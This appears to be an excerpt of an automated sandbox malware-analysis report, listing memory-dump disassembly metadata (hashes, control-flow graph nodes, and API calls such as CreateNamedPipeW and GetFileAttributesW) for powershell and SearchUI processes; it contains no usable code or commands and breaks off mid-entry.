                                                    • Instruction ID: eda68c3316bbe258466c534fd7b838e17ae20e82f0531c4094f4c12bf1168695
                                                    • Opcode Fuzzy Hash: 384d2647928866b4c2fb575162d5b715ca31ec6fd5a5a0315a6e20c1aaa82a17
                                                    • Instruction Fuzzy Hash: B9B092300467088AC21427E4BA083697A9CB78630FF884226E60C91665DFA094A4C9BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.669059512.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_1550000_SearchUI.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a62fafe658016c55abb37401ddc4c28a546980b79f5ad81f7523e203fbfbeebd
                                                    • Instruction ID: 1fc26570a5f1a53fed71cf91294279715d593ba2d5ab79897de7c4ae60d93b9c
                                                    • Opcode Fuzzy Hash: a62fafe658016c55abb37401ddc4c28a546980b79f5ad81f7523e203fbfbeebd
                                                    • Instruction Fuzzy Hash: CB813774E04218CFCB18DFA9C990AEEBBB2FF89304F10856AD509AB354DB359985CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:6.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.7%
                                                    Total number of Nodes:45
                                                    Total number of Limit Nodes:2
                                                    execution_graph 31383 f0fa90 31384 f0faee CreateNamedPipeW 31383->31384 31386 f0fbc2 31384->31386 31387 f02200 31388 f02212 31387->31388 31392 f04280 31388->31392 31397 f04270 31388->31397 31389 f02241 31394 f0428a 31392->31394 31393 f042af 31393->31389 31394->31393 31402 f04338 31394->31402 31407 f04329 31394->31407 31398 f0428a 31397->31398 31399 f042af 31398->31399 31400 f04338 GetFileAttributesW 31398->31400 31401 f04329 GetFileAttributesW 31398->31401 31399->31389 31400->31399 31401->31399 31403 f0434b 31402->31403 31412 f043b0 31403->31412 31418 f043a0 31403->31418 31404 f04369 31404->31393 31408 f04369 31407->31408 31409 f04332 31407->31409 31408->31393 31410 f043b0 GetFileAttributesW 31409->31410 31411 f043a0 GetFileAttributesW 31409->31411 31410->31408 31411->31408 31413 f043c5 31412->31413 31415 f044cb 31413->31415 31424 f061c0 31413->31424 31414 f0448a 31414->31415 31417 f061c0 GetFileAttributesW 31414->31417 31415->31404 31417->31415 31419 f043b0 31418->31419 31420 f044cb 31419->31420 31423 f061c0 GetFileAttributesW 31419->31423 31420->31404 31421 f0448a 31421->31420 31422 f061c0 GetFileAttributesW 31421->31422 31422->31420 31423->31421 31429 f061c0 GetFileAttributesW 31424->31429 31431 f06220 31424->31431 31425 f061ea 31426 f061f0 31425->31426 31436 f0565c 31425->31436 31426->31414 31429->31425 31432 f06238 31431->31432 31433 f0624d 31432->31433 31434 f0565c GetFileAttributesW 31432->31434 31433->31425 31435 f0627e 31434->31435 31435->31425 31437 f06668 GetFileAttributesW 31436->31437 31439 f0627e 31437->31439 31439->31414

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 78e83d8-78e83e5 1 78e837a-78e8384 0->1 2 78e83e7-78ea5f1 0->2 1->0 548 78ea5fb-78ea60c 2->548 550 78ea612-78ea664 548->550
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 543739c51f45843aab3961a9fb791916bc4f085b9afdfd43ab09c57c1a16315f
                                                    • Instruction ID: df5251edb31019abaeb8559ae4252b0fb06c27c0ceb7d5ea42052e3dca6db8bd
                                                    • Opcode Fuzzy Hash: 543739c51f45843aab3961a9fb791916bc4f085b9afdfd43ab09c57c1a16315f
                                                    • Instruction Fuzzy Hash: 65035975A0811C8FDB24DB60CA50B9E77BAEF85314F1142A9D24B6B660DF31AEC4CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 556 78e83e8-78ea60c 1103 78ea612-78ea664 556->1103
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90f5b103f3343a6503bd6e978bf8f007cbb410e9d958b49f1b74d15d3e8ad093
                                                    • Instruction ID: 6d3d90c791888f2b642d6c5358fd99c00dc217abfe3a60173040c68e82ac4bcc
                                                    • Opcode Fuzzy Hash: 90f5b103f3343a6503bd6e978bf8f007cbb410e9d958b49f1b74d15d3e8ad093
                                                    • Instruction Fuzzy Hash: DD035975A0811C8FDB24DB61CA40B9E77BAEF85314F1142A9D24B6B660DF31AEC4CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1131 f0fa90-f0fafa 1133 f0fb05-f0fb0e 1131->1133 1134 f0fafc-f0fb02 1131->1134 1135 f0fb10-f0fb2c 1133->1135 1136 f0fb2d-f0fb31 1133->1136 1134->1133 1135->1136 1137 f0fb52-f0fbc0 CreateNamedPipeW 1136->1137 1138 f0fb33-f0fb4a 1136->1138 1140 f0fbc2-f0fbc8 1137->1140 1141 f0fbc9-f0fc07 1137->1141 1138->1137 1140->1141 1145 f0fc09-f0fc0d 1141->1145 1146 f0fc1c-f0fc20 1141->1146 1145->1146 1147 f0fc0f-f0fc12 1145->1147 1148 f0fc31 1146->1148 1149 f0fc22-f0fc2e 1146->1149 1147->1146 1151 f0fc32 1148->1151 1149->1148 1151->1151
                                                    APIs
                                                    • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 00F0FBB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.664748575.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_f00000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateNamedPipe
                                                    • String ID:
                                                    • API String ID: 2489174969-0
                                                    • Opcode ID: 6a6cfc0fe3268ac505cc833c86b2aed10b235f79d31f894b2f9a75212d02010d
                                                    • Instruction ID: 4e39b7051cc11919dfc163ebe1fa8f00e6fb4708d6e339b5120f6a654c091e68
                                                    • Opcode Fuzzy Hash: 6a6cfc0fe3268ac505cc833c86b2aed10b235f79d31f894b2f9a75212d02010d
                                                    • Instruction Fuzzy Hash: E651F5B1D003499FDB14CFA9D984B8DBBB2BF88314F25812AE408AB250D7759985DF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1375 78ec078-78ec0b7 1377 78ec0bd-78ec0ff 1375->1377 1378 78eca35-78ecc03 1375->1378 1385 78ec338-78ec36b 1377->1385 1386 78ec105-78ec198 1377->1386 1397 78ec472-78ec488 1385->1397 1398 78ec371-78ec3d4 1385->1398 1457 78ec19e-78ec1b9 1386->1457 1458 78ec317-78ec336 1386->1458 1404 78ec48a-78ec490 1397->1404 1405 78ec496-78ec4c5 1397->1405 1453 78ec45a-78ec46f 1398->1453 1454 78ec3da-78ec3f2 1398->1454 1404->1405 1408 78ec544-78ec585 call 78eb960 1404->1408 1423 78ec4fd-78ec541 call 78eb960 1405->1423 1424 78ec4c7-78ec4e2 call 78eb960 1405->1424 1435 78ec5c7-78ec5ee 1408->1435 1436 78ec587-78ec5af 1408->1436 1443 78ec5fa-78ec600 1435->1443 1436->1435 1456 78ec5b1-78ec5bc 1436->1456 1446 78ec616-78ec61c 1443->1446 1447 78ec602-78ec610 1443->1447 1449 78ec61e-78ec62c 1446->1449 1450 78ec632-78ec63e 1446->1450 1447->1446 1468 78ec6f2-78ec6f8 1447->1468 1449->1450 1449->1468 1471 78ec68a-78ec696 1450->1471 1472 78ec640-78ec672 1450->1472 1453->1397 1461 78ec3f4-78ec3f8 1454->1461 1462 78ec405-78ec40f 1454->1462 1473 78ec5c5 1456->1473 1466 78ec1cf-78ec1dc 1457->1466 1467 78ec1bb-78ec1bf 1457->1467 1458->1385 1461->1462 1469 78ec3fa-78ec3fd 1461->1469 1478 78ec427-78ec42d 1462->1478 1479 78ec411-78ec417 1462->1479 1492 78ec1de-78ec1e4 1466->1492 1493 78ec1f4-78ec1fa 1466->1493 1467->1466 1474 78ec1c1-78ec1c7 1467->1474 1476 78ec6fe-78ec763 1468->1476 1477 78ec913-78ec919 1468->1477 1469->1462 1471->1468 1496 78ec698-78ec6ca 1471->1496 1472->1471 1517 78ec674-78ec684 1472->1517 1473->1443 1474->1466 1533 78ec8bc-78ec8dd 1476->1533 1534 78ec769-78ec77d 1476->1534 1481 78ec91f-78ec976 1477->1481 1482 78eca16-78eca1d 1477->1482 1488 78ec42f-78ec433 1478->1488 1489 78ec43a-78ec458 1478->1489 1485 78ec41b-78ec41d 1479->1485 1486 78ec419 1479->1486 1540 78ec9cc-78ec9e1 1481->1540 1541 78ec978-78ec999 1481->1541 1485->1478 1486->1478 1488->1489 1499 78ec435-78ec437 1488->1499 1489->1453 1489->1454 1494 78ec1e8-78ec1ea 1492->1494 1495 78ec1e6 1492->1495 1497 78ec1fc-78ec200 1493->1497 1498 78ec207-78ec21e 1493->1498 1494->1493 1495->1493 1496->1468 1526 78ec6cc-78ec6e2 1496->1526 1497->1498 1501 78ec202-78ec204 1497->1501 1511 78ec224-78ec269 1498->1511 1512 78ec302-78ec311 1498->1512 1499->1489 1501->1498 1549 78ec26b-78ec272 1511->1549 1550 78ec2d2-78ec2e8 1511->1550 1512->1457 1512->1458 1517->1471 1526->1468 1533->1477 1538 78ec843-78ec867 1534->1538 1539 78ec783-78ec79e 1534->1539 1563 78ec869-78ec86f 1538->1563 1564 78ec881-78ec8b6 1538->1564 1539->1538 1551 78ec7a4-78ec7ea 1539->1551 1540->1482 1552 78ec99b-78ec9a1 1541->1552 1553 78ec9b1-78ec9ca 1541->1553 1554 78ec274-78ec278 1549->1554 1555 78ec285-78ec28f 1549->1555 1550->1512 1592 78ec7ec-78ec7f9 1551->1592 1593 78ec82b-78ec841 1551->1593 1559 78ec9a5-78ec9a7 1552->1559 1560 78ec9a3 1552->1560 1553->1540 1553->1541 1554->1555 1562 78ec27a-78ec27d 1554->1562 1574 78ec2a7-78ec2ad 1555->1574 1575 78ec291-78ec297 1555->1575 1559->1553 1560->1553 1562->1555 1568 78ec873-78ec87f 1563->1568 1569 78ec871 1563->1569 1564->1533 1564->1534 1568->1564 1569->1564 1580 78ec2af-78ec2b3 1574->1580 1581 78ec2ba-78ec2d0 1574->1581 1578 78ec29b-78ec29d 1575->1578 1579 78ec299 1575->1579 1578->1574 1579->1574 1580->1581 1584 78ec2b5-78ec2b7 1580->1584 1581->1549 1581->1550 1584->1581 1597 78ec7fb-78ec801 1592->1597 1598 78ec811-78ec829 1592->1598 1593->1538 1599 78ec805-78ec807 1597->1599 1600 78ec803 1597->1600 1598->1592 1598->1593 1599->1598 1600->1598
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0170d202dca915930e88a09cc715add5d746815997c556b90480af5e7b9ead83
                                                    • Instruction ID: bc749ea0e34c85b091ed414923193eb22957d83ba69fa2b79dd94bbdd73cabd6
                                                    • Opcode Fuzzy Hash: 0170d202dca915930e88a09cc715add5d746815997c556b90480af5e7b9ead83
                                                    • Instruction Fuzzy Hash: E9625EB0A00219CFDB14DF64C850BAE73B6EF96308F1185A9D50AEB790DB35ED45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1109 f0fa87-f0fafa 1112 f0fb05-f0fb0e 1109->1112 1113 f0fafc-f0fb02 1109->1113 1114 f0fb10-f0fb2c 1112->1114 1115 f0fb2d-f0fb31 1112->1115 1113->1112 1114->1115 1116 f0fb52-f0fbc0 CreateNamedPipeW 1115->1116 1117 f0fb33-f0fb4a 1115->1117 1119 f0fbc2-f0fbc8 1116->1119 1120 f0fbc9-f0fc07 1116->1120 1117->1116 1119->1120 1124 f0fc09-f0fc0d 1120->1124 1125 f0fc1c-f0fc20 1120->1125 1124->1125 1126 f0fc0f-f0fc12 1124->1126 1127 f0fc31 1125->1127 1128 f0fc22-f0fc2e 1125->1128 1126->1125 1130 f0fc32 1127->1130 1128->1127 1130->1130
                                                    APIs
                                                    • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 00F0FBB0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.664748575.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_f00000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateNamedPipe
                                                    • String ID:
                                                    • API String ID: 2489174969-0
                                                    • Opcode ID: 2773f032fe3c635f83abaab0cf2c893f3561217855a5c67c226c93c2f0efa2d3
                                                    • Instruction ID: c8012b2362e8d5f0b05889f23a8af947a1e31468fc3fde0a637009335f9bf4a5
                                                    • Opcode Fuzzy Hash: 2773f032fe3c635f83abaab0cf2c893f3561217855a5c67c226c93c2f0efa2d3
                                                    • Instruction Fuzzy Hash: 455117B1D003499FDB14CFA9D984B8DBBF2BF88314F25802AE808AB250C7749985DF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1253 f06661-f066b2 1256 f066b4-f066b7 1253->1256 1257 f066ba-f066e5 GetFileAttributesW 1253->1257 1256->1257 1258 f066e7-f066ed 1257->1258 1259 f066ee-f0670b 1257->1259 1258->1259
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 00F066D8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.664748575.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_f00000_powershell.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: f8f1c2ff0985fe05b312f978ee022d54552f92117993eeeb691ff0ac7b042090
                                                    • Instruction ID: 04353352f725594a27c3c6ac0e3f11438de609a7926b6525d7ecda528bcb5950
                                                    • Opcode Fuzzy Hash: f8f1c2ff0985fe05b312f978ee022d54552f92117993eeeb691ff0ac7b042090
                                                    • Instruction Fuzzy Hash: 172122B1D046199BCB10CF9AD984BDEFBB8FB48324F10852AE818A7240D775A955CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1262 f0565c-f066b2 1265 f066b4-f066b7 1262->1265 1266 f066ba-f066e5 GetFileAttributesW 1262->1266 1265->1266 1267 f066e7-f066ed 1266->1267 1268 f066ee-f0670b 1266->1268 1267->1268
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(00000000), ref: 00F066D8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.664748575.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_f00000_powershell.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 1d20fe95b462fb2054799a6874ea61f9094f5c0be04b91de94c966c47961b05f
                                                    • Instruction ID: 1d93fccbe51f930daf6e84a675b809d32c3f2cbb2d8ad11b0688d3e8b6315cae
                                                    • Opcode Fuzzy Hash: 1d20fe95b462fb2054799a6874ea61f9094f5c0be04b91de94c966c47961b05f
                                                    • Instruction Fuzzy Hash: 282153B1D046199BCB10CF9AC444B9EFBB4FB48324F00812AE819B7640D775A955DFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 577e7c03a0b0bdda6a1ee5d5581c8d3cfbbb9706e8e51498838d1556318b9cb2
                                                    • Instruction ID: 46f7b84d04d1efb78131d9327e91ff31655c2fd9185918d125bae01c3449d49d
                                                    • Opcode Fuzzy Hash: 577e7c03a0b0bdda6a1ee5d5581c8d3cfbbb9706e8e51498838d1556318b9cb2
                                                    • Instruction Fuzzy Hash: A8A1D47060820A8FDB10DF68C554BAE7BE6EF8530CF018969E506CB395EB74ED46CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2cc40205aeb3bfc4785801a4cda9d8f06ed2a1568dd98b1b3a1c27da6f0c6f24
                                                    • Instruction ID: a2c27ecf0ad70a96f77550576e242eafd8159e29f6e3f4b10804a37cae22e002
                                                    • Opcode Fuzzy Hash: 2cc40205aeb3bfc4785801a4cda9d8f06ed2a1568dd98b1b3a1c27da6f0c6f24
                                                    • Instruction Fuzzy Hash: 88915770A01219CFEB14DF65D844BAEBBB6EF89310F0481A9E509E7391DB309D45CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 102c72bb697dc6a2fb06e89a30c65da4f63c7db5ac335dc4d814d43c13a2f691
                                                    • Instruction ID: 1789cb5e28c978064b9eb443bda0f5e365ec54d9aa637281e7c76580c216319e
                                                    • Opcode Fuzzy Hash: 102c72bb697dc6a2fb06e89a30c65da4f63c7db5ac335dc4d814d43c13a2f691
                                                    • Instruction Fuzzy Hash: C251E534B041199FDF05DB95D811BAEBBBBEB8C300F104129E906A7384DF36AD418BA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d5b5d823cb595cceb18013d5cfb82572d95f6b8a11bdbef8803a20da30f5c783
                                                    • Instruction ID: 0c5e67d5dee33c7dd50110a4c6910a1d252a4f6efb07b25ed5d02745a2ff43a7
                                                    • Opcode Fuzzy Hash: d5b5d823cb595cceb18013d5cfb82572d95f6b8a11bdbef8803a20da30f5c783
                                                    • Instruction Fuzzy Hash: 0751B734B041195FDF05DB95DC11BAEB7BBEB8C310F104129E906A7384DF36AD418BA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1290afda2e9958af15839fc22e228baa664988e5fbe14980922af5648d4656a4
                                                    • Instruction ID: 264b75d4273f180a071b2d6cfb87a35d3fb5e52c39def06992669bb51a798ea4
                                                    • Opcode Fuzzy Hash: 1290afda2e9958af15839fc22e228baa664988e5fbe14980922af5648d4656a4
                                                    • Instruction Fuzzy Hash: 264182343082458FD704DB39D554A2E77AAEF8A318B528579E506CF3A2CF35EC46CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b773fda4b78533a85de8a886b87ad5886f3e61c2d4626c7fbee48ff90ae05d4
                                                    • Instruction ID: e9aae73fb29ecfde3c2fa83c356fb97561ed0bc30921af060b180afb5dac33fe
                                                    • Opcode Fuzzy Hash: 6b773fda4b78533a85de8a886b87ad5886f3e61c2d4626c7fbee48ff90ae05d4
                                                    • Instruction Fuzzy Hash: 3B21E675B042089BDB04DF69E8507EE7BEAEF86315F10443AE905D7740DB359D4287A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1309d41a8c25f4285a413f7b599ddfc8d354475cbecc71410b0a4423dc357d85
                                                    • Instruction ID: 180d7b1b200eb7fcb72505253db5b11030015072b52bbd201267361cb5a4ead5
                                                    • Opcode Fuzzy Hash: 1309d41a8c25f4285a413f7b599ddfc8d354475cbecc71410b0a4423dc357d85
                                                    • Instruction Fuzzy Hash: 3B318F757001028FE704DFA9D9419BEB7BAEBC9310B148135EA09D7354EF31ED458BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 658a4a573d4469d5246c1421b9b7316a8ad63c47a732fdf4785b92e6a0ce518a
                                                    • Instruction ID: bf7c24c91b586e92a394da061e5667923091c2fadf6e5a52c6c90fe464e12c8d
                                                    • Opcode Fuzzy Hash: 658a4a573d4469d5246c1421b9b7316a8ad63c47a732fdf4785b92e6a0ce518a
                                                    • Instruction Fuzzy Hash: 8A21CC702083819FC3129F38C45469ABFB6FF92224B0549AFC186CF342DB71894AC7D2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62a87a63d4d2461fff6eca73cb3e515045b153ba9d2fe49340eeb58901e00a97
                                                    • Instruction ID: f31c1d5d52c5c109f3c04e9d0fe7e353428b6de8d4cb81a0d57def6c71ecfd8f
                                                    • Opcode Fuzzy Hash: 62a87a63d4d2461fff6eca73cb3e515045b153ba9d2fe49340eeb58901e00a97
                                                    • Instruction Fuzzy Hash: AF11E9B56042028FE705CF69DC40AABBBFEFF99310B144676E948D7391EB309901CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c3f0b5617e04040cd15cb19521e9b966a7de3d51be3e16ec5b476bda3e9db3a
                                                    • Instruction ID: aaa130481891fe3a7aa671ee6753fa34ab4ecf227c84ff7955b90b7a09ed537b
                                                    • Opcode Fuzzy Hash: 7c3f0b5617e04040cd15cb19521e9b966a7de3d51be3e16ec5b476bda3e9db3a
                                                    • Instruction Fuzzy Hash: C9016DB2A083848FCB124B389C545DD3F6AAFA6270B0505AEC051CB3C1EE70D986C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c34aa8ff3bfce4e0c98630f0363402715bf7b95869fcee6c572ffa1ba19e5e8
                                                    • Instruction ID: b9e8c111d9cb8005f123ab1942bdd2c4304d66758343ea149bacbe932903c155
                                                    • Opcode Fuzzy Hash: 1c34aa8ff3bfce4e0c98630f0363402715bf7b95869fcee6c572ffa1ba19e5e8
                                                    • Instruction Fuzzy Hash: 2601F170604B109BC3209B78C444A5EB7AAEFE1228B018A2CD60BCB704EFB1DD4687E5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.663634905.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_ddd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7084d87e5173b2c858ad977ff89bb5bad953252852219b139b32d68d1d48b1a0
                                                    • Instruction ID: 9604f2be7d0fcdad9a651dc4c1ba3403a0ad61243eab2111eea5e6e35b00822b
                                                    • Opcode Fuzzy Hash: 7084d87e5173b2c858ad977ff89bb5bad953252852219b139b32d68d1d48b1a0
                                                    • Instruction Fuzzy Hash: 8101F270408344AEEF204A22CC84B76BB8CEF81368F18845BED455B382C379D986CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.663634905.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_ddd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c00600388fafcd7f74ed753924219c679db6f99067bb7182b1883fbc1bbdd641
                                                    • Instruction ID: 929037189cce7055811aad9e6d0b010d18fafe231202a26d7d1e6575ad497f55
                                                    • Opcode Fuzzy Hash: c00600388fafcd7f74ed753924219c679db6f99067bb7182b1883fbc1bbdd641
                                                    • Instruction Fuzzy Hash: 89014C6140D7C45FDB128B258C94B62BFB4EF43224F1D81DBD9848F2A3C2695C49C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1699ea26b568fd241f8505eabe5889005ae0efb9b1bceb3733d53ec49db61e0
                                                    • Instruction ID: 1b491f9519708fdaafb53f9462eab0234a01b9549ce0fced6d6c12ce023368e6
                                                    • Opcode Fuzzy Hash: e1699ea26b568fd241f8505eabe5889005ae0efb9b1bceb3733d53ec49db61e0
                                                    • Instruction Fuzzy Hash: 71F07832B002918BC7254A28D8441E97BE6EFEE230F0405AED582C7381DFB48846C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
